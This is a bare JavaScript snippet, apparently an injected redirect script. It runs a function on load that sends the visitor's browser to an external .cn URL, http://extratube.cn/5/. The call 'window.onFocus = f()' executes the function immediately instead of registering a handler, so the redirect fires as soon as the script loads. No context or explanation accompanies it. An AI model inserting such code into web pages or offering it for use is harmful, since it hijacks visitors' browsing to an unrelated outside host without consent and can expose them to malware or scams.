function f(){
document.location.href='http://extratube.cn/5/';
}
window.onFocus = f()
